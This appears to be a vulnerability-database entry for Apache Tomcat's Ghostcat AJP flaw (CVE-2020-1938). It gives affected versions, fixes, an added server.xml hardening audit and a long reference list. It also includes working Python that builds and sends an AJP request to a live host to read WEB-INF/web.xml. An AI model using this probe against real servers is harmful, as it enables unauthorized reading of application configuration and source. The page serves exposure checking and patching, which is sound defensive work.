Vulnerability Details
Apache Tomcat Input Validation Error Vulnerability
Vulnerability Summary
Apache Tomcat is a lightweight web application server from the Apache Software Foundation (USA). It implements support for Java Servlets and JavaServer Pages (JSP).
The AJP (Apache JServ Protocol) connector in Apache Tomcat 7.x before 7.0.100, 8.x before 8.5.51 and 9.x before 9.0.31 has a file read/inclusion vulnerability (CVE-2020-1938, widely known as "Ghostcat"). Tomcat treats every connection to the AJP port (8009 by default) as coming from a trusted reverse proxy, so an attacker who can reach that port can set AJP request attributes that make Tomcat read or include any file under a deployed web application, such as its configuration (WEB-INF/web.xml) or source code. If the application also lets the attacker place a file inside the webapp (for example through an upload feature), the same include path can be used to have that file processed as a JSP, turning the file read into code execution. Deployments that do not need AJP should disable the connector; those that do should bind it to a trusted interface and require an AJP secret.
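The AJP exchange described above, as an added example that is not part of the original page or of the Tomcat project: a Python encoder for the AJP13 FORWARD_REQUEST packet carrying the javax.servlet.include.* request attributes that Ghostcat relies on, and a decoder for the SEND_HEADERS / SEND_BODY_CHUNK / END_RESPONSE packets Tomcat answers with. The host names, the port and the sample response are constructed for illustration, and the `probe_live` helper is only for systems you are authorized to test.

```python
"""AJP13 request builder and response parser for checking CVE-2020-1938 exposure.

Added example; not code from the original page or from the Tomcat project.
Hosts, ports and the sample response below are constructed for illustration.
"""
import socket
import struct

AJP_MAGIC_REQ = b"\x12\x34"    # client -> container packets
AJP_MAGIC_RESP = b"AB"         # container -> client packets
FORWARD_REQUEST = 2            # prefix code of a forwarded HTTP request
METHOD_GET = 2                 # AJP method code for GET
SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE = 3, 4, 5
ATTR_REQ_ATTRIBUTE = 0x0A      # generic name=value request attribute
ATTR_TERMINATOR = 0xFF
HDR_HOST = b"\xa0\x0b"         # coded "Host" header name


def ajp_string(value):
    """AJP string: big-endian 16-bit length, UTF-8 bytes, NUL; None is 0xFFFF."""
    if value is None:
        return b"\xff\xff"
    data = value.encode("utf-8")
    return struct.pack(">H", len(data)) + data + b"\x00"


def build_forward_request(req_uri, attributes, server_name="localhost", server_port=8080):
    """Encode a FORWARD_REQUEST carrying arbitrary (name, value) request attributes.

    Tomcat copies these attributes into the servlet request, which is what lets
    an untrusted AJP peer steer DefaultServlet (the CVE-2020-1938 mechanism).
    """
    payload = bytes([FORWARD_REQUEST, METHOD_GET])
    payload += ajp_string("HTTP/1.1")       # protocol
    payload += ajp_string(req_uri)          # req_uri
    payload += ajp_string("127.0.0.1")      # remote_addr, as asserted by the client
    payload += ajp_string(None)             # remote_host
    payload += ajp_string(server_name)      # server_name
    payload += struct.pack(">H", server_port)
    payload += b"\x00"                      # is_ssl = false
    payload += struct.pack(">H", 1)         # num_headers
    payload += HDR_HOST + ajp_string(server_name)
    for name, value in attributes:
        payload += bytes([ATTR_REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    payload += bytes([ATTR_TERMINATOR])
    return AJP_MAGIC_REQ + struct.pack(">H", len(payload)) + payload


def ghostcat_probe_packet(context_path="/", target="WEB-INF/web.xml"):
    """Include attributes that make DefaultServlet serve `target` from the webapp."""
    attrs = [
        ("javax.servlet.include.request_uri", "/"),
        ("javax.servlet.include.path_info", target),
        ("javax.servlet.include.servlet_path", "/"),
    ]
    return build_forward_request(context_path, attrs)


def parse_response(stream):
    """Walk container->client packets; return (http_status, body_bytes)."""
    status, body, pos = None, bytearray(), 0
    while pos + 4 <= len(stream):
        if stream[pos:pos + 2] != AJP_MAGIC_RESP:
            raise ValueError("bad AJP response magic at offset %d" % pos)
        (length,) = struct.unpack(">H", stream[pos + 2:pos + 4])
        packet = stream[pos + 4:pos + 4 + length]
        pos += 4 + length
        if not packet:
            break
        if packet[0] == SEND_HEADERS:            # prefix, status int16, message, headers
            (status,) = struct.unpack(">H", packet[1:3])
        elif packet[0] == SEND_BODY_CHUNK:       # prefix, chunk_len int16, data, NUL
            (chunk_len,) = struct.unpack(">H", packet[1:3])
            body += packet[3:3 + chunk_len]
        elif packet[0] == END_RESPONSE:
            break
    return status, bytes(body)


def sample_response():
    """Constructed stand-in for a vulnerable Tomcat's reply (not a real capture)."""
    data = b"<web-app>\n  <display-name>demo</display-name>\n</web-app>\n"
    packets = [
        bytes([SEND_HEADERS]) + struct.pack(">H", 200) + ajp_string("OK") + struct.pack(">H", 0),
        bytes([SEND_BODY_CHUNK]) + struct.pack(">H", len(data)) + data + b"\x00",
        bytes([END_RESPONSE, 1]),
    ]
    return b"".join(AJP_MAGIC_RESP + struct.pack(">H", len(p)) + p for p in packets)


def probe_live(host, port=8009, timeout=5.0):
    """Send the probe to a real AJP port (authorized targets only) and parse the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(ghostcat_probe_packet())
        data = b""
        try:
            while True:
                part = sock.recv(8192)
                if not part:
                    break
                data += part
                if data[-5:-1] == AJP_MAGIC_RESP + b"\x00\x02" + bytes([END_RESPONSE]):
                    break                        # END_RESPONSE packet seen
        except socket.timeout:
            pass
    return parse_response(data)


if __name__ == "__main__":
    status, body = parse_response(sample_response())   # offline demo on the constructed reply
    print("status", status, "body bytes", len(body))
```

A 200 status with web.xml content in the body from a host you did not expect to expose AJP is the signal to act on; a fixed Tomcat with `secretRequired` in effect rejects the packet because it carries no secret attribute, and a loopback-bound connector is not reachable at all.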
Vendor Advisory
The vendor has released fixed versions (7.0.100, 8.5.51 and 9.0.31); see the vendor homepage for details:
http://tomcat.apache.org/
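A practitioner check to go with the fix (an added example, not code from the page or from Tomcat): the fixed releases changed the AJP connector defaults to bind to loopback and to require a shared secret, so a server.xml audit can flag connectors that still have the pre-fix shape. The two server.xml fragments are constructed samples, and the secret value is a placeholder.

```python
"""Audit Tomcat server.xml AJP connectors against the defaults the fix introduced.

Added example; not code from the original page or from Tomcat. Tomcat 7.0.100,
8.5.51 and 9.0.31 changed the AJP connector to bind to loopback by default and
to require a shared secret (secretRequired). Both server.xml fragments are
constructed samples, not files from a real deployment.
"""
import xml.etree.ElementTree as ET

LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "localhost"}

# Constructed: the pre-fix shape, AJP on every interface with no secret.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

# Constructed: loopback-only, secret required and set (the value is a placeholder).
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="replace-with-a-long-random-value"/>
  </Service>
</Server>"""


def audit_ajp_connectors(server_xml):
    """Return [(port, [findings...]), ...] for each AJP connector; [] findings means hardened.

    No AJP connector at all (the fixed default server.xml comments it out) yields [].
    """
    root = ET.fromstring(server_xml)
    report = []
    for conn in root.iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue
        findings = []
        address = conn.get("address")
        if address not in LOOPBACK_ADDRESSES:
            findings.append("binds to %s; restrict to loopback or a proxy-only interface"
                            % (address or "all interfaces"))
        # 'requiredSecret' is the pre-fix attribute name, 'secret' the current one.
        secret = conn.get("secret") or conn.get("requiredSecret")
        if conn.get("secretRequired", "true").lower() == "false":
            findings.append("secretRequired=false lets any peer send forward requests")
        elif not secret:
            findings.append("no AJP secret set; pre-fix versions accept any peer, "
                            "fixed versions fail to start the connector")
        report.append((conn.get("port"), findings))
    return report


def summarize(server_xml):
    """Human-readable audit, one line per AJP connector."""
    lines = []
    for port, findings in audit_ajp_connectors(server_xml):
        state = "OK" if not findings else "; ".join(findings)
        lines.append("AJP connector port %s: %s" % (port, state))
    return "\n".join(lines) or "no AJP connector configured (safest)"


if __name__ == "__main__":
    print(summarize(WEAK_SERVER_XML))
    print(summarize(HARDENED_SERVER_XML))
```

The audit is deliberately conservative: a missing secret is reported even though a fixed Tomcat would refuse to start such a connector, because the same file may be deployed on an unpatched instance where the connector starts and accepts every peer.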
References
Source: MLIST
Link: https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794@%3Cnotifications.ofbiz.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522@%3Cnotifications.ofbiz.apache.org%3E
Source: GENTOO
Link: https://security.gentoo.org/glsa/202003-43
Source: SUSE
Link: http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
Source: CONFIRM
Link: http://support.blackberry.com/kb/articleDetail?articleNumber=000062739
Source: MLIST
Link: https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a@%3Cdev.tomee.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760@%3Cnotifications.ofbiz.apache.org%3E
Source: MLIST
Link: https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html
Source: MISC
Link: https://www.oracle.com/security-alerts/cpuoct2020.html
Source: MLIST
Link: https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e@%3Cusers.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c@%3Cusers.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194@%3Ccommits.tomee.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65@%3Cusers.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed@%3Cdev.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b@%3Cusers.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f@%3Cusers.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1@%3Cnotifications.ofbiz.apache.org%3E
Source: MISC
Link: https://www.oracle.com/security-alerts/cpujan2021.html
Source: MLIST
Link: https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6@%3Cdev.tomcat.apache.org%3E
Source: FEDORA
Link: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG/
Source: DEBIAN
Link: https://www.debian.org/security/2020/dsa-4673
Source: MLIST
Link: https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9@%3Cusers.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97@%3Ccommits.tomee.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e@%3Cdev.tomee.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2@%3Cusers.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a@%3Cusers.tomee.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864@%3Cusers.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b@%3Cusers.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d@%3Cdev.tomcat.apache.org%3E
Source: DEBIAN
Link: https://www.debian.org/security/2020/dsa-4680
Source: MLIST
Link: https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3@%3Ccommits.tomee.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca@%3Cbugs.httpd.apache.org%3E
Source: CONFIRM
Link: https://security.netapp.com/advisory/ntap-20200226-0002/
Source: MLIST
Link: https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db@%3Cnotifications.ofbiz.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1@%3Cusers.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7@%3Ccommits.ofbiz.apache.org%3E
Source: FEDORA
Link: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS/
Source: FEDORA
Link: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B/
Source: MLIST
Link: https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f@%3Cusers.tomcat.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb@%3Ccommits.tomee.apache.org%3E
Source: MLIST
Link: https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425@%3Cnotifications.ofbiz.apache.org%3E
Source: MLIST
Link: https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html
Source: MLIST
Link: https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda@%3Ccommits.tomee.apache.org%3E
Source: SUSE
Link: http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html
Source: MISC
Link: https://www.oracle.com/security-alerts/cpujul2020.html
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1437/
Source: packetstormsecurity.com
Link: https://packetstormsecurity.com/files/156786/Red-Hat-Security-Advisory-2020-0855-01.html
Source: www.ibm.com
Link: https://www.ibm.com/blogs/psirt/security-bulletin-ibm-websphere-cast-iron-solution-app-connect-professional-is-affected-by-apache-tomcat-vulnerabilities-4/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.0667/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.0998/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.0867/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.2750/
Source: www.ibm.com
Link: https://www.ibm.com/blogs/psirt/security-bulletin-open-source-apache-tomcat-vulnerabilities-affect-ibm-tivoli-application-dependency-discovery-manager-cve-2020-1938-2/
Source: packetstormsecurity.com
Link: https://packetstormsecurity.com/files/158354/Red-Hat-Security-Advisory-2020-2840-01.html
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.3250/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1091/
Source: www.ibm.com
Link: https://www.ibm.com/blogs/psirt/security-bulletin-open-source-apache-tomcat-vulnerabilities-affect-ibm-tivoli-application-dependency-discovery-manager-cve-2020-1938/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1728/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1382/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1350/
Source: www.ibm.com
Link: https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-tomcat-affects-ibm-spectrum-protect-plus-cve-2020-1938/
Source: nvd.nist.gov
Link: https://nvd.nist.gov/vuln/detail/CVE-2020-1938
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1887/
Source: packetstormsecurity.com
Link: https://packetstormsecurity.com/files/163798/Red-Hat-Security-Advisory-2021-3140-01.html
Source: www.ibm.com
Link: https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache-tomcat-affects-ibm-platform-symphony-2/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1388/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1465/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1028/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1565/
Source: www.huawei.com
Link: https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20200715-01-tomact-cn
Source: packetstormsecurity.com
Link: https://packetstormsecurity.com/files/158267/Red-Hat-Security-Advisory-2020-2783-01.html
Source: www.nsfocus.net
Link: http://www.nsfocus.net/vulndb/45940
Source: vigilance.fr
Link: https://vigilance.fr/vulnerability/Apache-Tomcat-code-execution-via-Enabled-AJP-Connector-31664
Source: packetstormsecurity.com
Link: https://packetstormsecurity.com/files/156827/Gentoo-Linux-Security-Advisory-202003-43.html
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.0826/
Source: packetstormsecurity.com
Link: https://packetstormsecurity.com/files/156858/Red-Hat-Security-Advisory-2020-0912-01.html
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.0799/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.2266/
Source: us-cert.cisa.gov
Link: https://us-cert.cisa.gov/ics/advisories/icsma-21-187-01
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.0963/
Source: mp.weixin.qq.com
Link: https://mp.weixin.qq.com/s/qIG_z9imxdLUobviSv7knw
Source: packetstormsecurity.com
Link: https://packetstormsecurity.com/files/157312/Red-Hat-Security-Advisory-2020-1520-01.html
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.2325/
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2021.2731
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1608/
Source: packetstormsecurity.com
Link: https://packetstormsecurity.com/files/161907/Apache-Ghostcat-Exploitation.html
Source: packetstormsecurity.com
Link: https://packetstormsecurity.com/files/157230/Red-Hat-Security-Advisory-2020-1478-01.html
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1747/
Source: packetstormsecurity.com
Link: https://packetstormsecurity.com/files/156781/Red-Hat-Security-Advisory-2020-0861-01.html
Source: www.auscert.org.au
Link: https://www.auscert.org.au/bulletins/ESB-2020.1983/
Affected Entities
None listed
Patches
- Remediation for the Apache Tomcat Input Validation Error Vulnerability (2020-02-20)